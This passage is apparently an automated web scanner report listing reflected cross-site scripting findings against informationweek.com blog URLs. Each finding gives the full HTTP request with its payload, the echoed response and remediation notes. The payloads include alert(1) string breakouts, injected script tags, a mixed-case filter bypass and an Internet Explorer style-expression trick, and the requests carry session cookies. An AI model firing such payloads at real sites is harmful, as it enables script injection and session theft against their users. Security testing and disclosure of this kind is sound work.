HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:46 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:46 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64731
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91826'-alert(1)-'1d4eb92758f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/91826'-alert(1)-'1d4eb92758f/archives/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64681
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b003f"><a%20b%3dc>f28ae0d9a92 was submitted in the REST URL parameter 3. This input was echoed as b003f"><a b=c>f28ae0d9a92 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archivesb003f"><a%20b%3dc>f28ae0d9a92/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63703
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archivesb003f"><a b=c>f28ae0d9a92/digital_life/i;kvarticleid=;kvauthor=;loc=300;grp=801274801" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ab08</script><a%20b%3dc>cb53909b3cb was submitted in the REST URL parameter 3. This input was echoed as 1ab08</script><a b=c>cb53909b3cb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives1ab08</script><a%20b%3dc>cb53909b3cb/digital_life/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63717
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archives1ab08</script><a b=c>cb53909b3cb/digital;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=152048639;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0143"><a%20b%3dc>6322ac6ed27 was submitted in the REST URL parameter 4. This input was echoed as f0143"><a b=c>6322ac6ed27 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/digital_lifef0143"><a%20b%3dc>6322ac6ed27/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59085
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/digital_lifef0143"><a b=c>6322ac6ed27/index;kvarticleid=;kvauthor=;loc=300;grp=254361901" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f11'-alert(1)-'a6fe55c5adf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/digital_life95f11'-alert(1)-'a6fe55c5adf/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:15 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:15 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59170
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/digital_life95f11'-alert(1)-'a6fe55c5adf/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=445774479;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7775"a%3d"b"194f11cacb7 was submitted in the REST URL parameter 5. This input was echoed as a7775"a="b"194f11cacb7 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/main/archives/digital_life/a7775"a%3d"b"194f11cacb7 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:19 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:19 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62732
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_DigitalLife_Welcome_Ad_1x1;key=digital_life+/blog/main/archives/digital_life/a7775"a="b"194f11cacb7/ind;kvarticleid=;kvauthor=;loc=300;grp=358828890" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2ffa'-alert(1)-'e38f30dda99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/maina2ffa'-alert(1)-'e38f30dda99/archives/global_cio/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64685
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210a8"><script>alert(1)</script>b058815550b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/main210a8"><script>alert(1)</script>b058815550b/archives/global_cio/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64739
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95287"style%3d"x%3aexpression(alert(1))"69b37b210ec was submitted in the REST URL parameter 3. This input was echoed as 95287"style="x:expression(alert(1))"69b37b210ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blog/main/95287"style%3d"x%3aexpression(alert(1))"69b37b210ec/global_cio/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63694
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/95287"style="x:expression(alert(1))"69b37b210ec/;kvarticleid=;kvauthor=;loc=300;grp=65927827" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 526b0'-alert(1)-'d2a8dc87bf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/526b0'-alert(1)-'d2a8dc87bf7/global_cio/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63570
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/526b0'-alert(1)-'d2a8dc87bf7/global_cio/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=414702705;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89363</script>70502110f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/89363</script>70502110f/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 58583
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/89363</script>70502110f/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=327372367;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b38d"><ScRiPt>alert(1)</ScRiPt>ee21f17714c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /blog/main/archives/6b38d"><ScRiPt>alert(1)</ScRiPt>ee21f17714c/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59299
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/6b38d"><ScRiPt>alert(1)</ScRiPt>ee21f17714c/index;kvarticleid=;kvauthor=;loc=300;grp=242682339" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3455d'-alert(1)-'008d863933e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/global_cio/index.html3455d'-alert(1)-'008d863933e HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59524
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/global_cio/index3455d'-alert(1)-'008d863933e;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=833671974;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90a06"><a%20b%3dc>9b2737e8d0f was submitted in the REST URL parameter 5. This input was echoed as 90a06"><a b=c>9b2737e8d0f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/global_cio/index.html90a06"><a%20b%3dc>9b2737e8d0f HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:05 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:05 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59439
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/global_cio/index90a06"><a b=c>9b2737e8d0f;kvarticleid=;kvauthor=;loc=300;grp=125733997" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c38a</script>6a9657b6156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
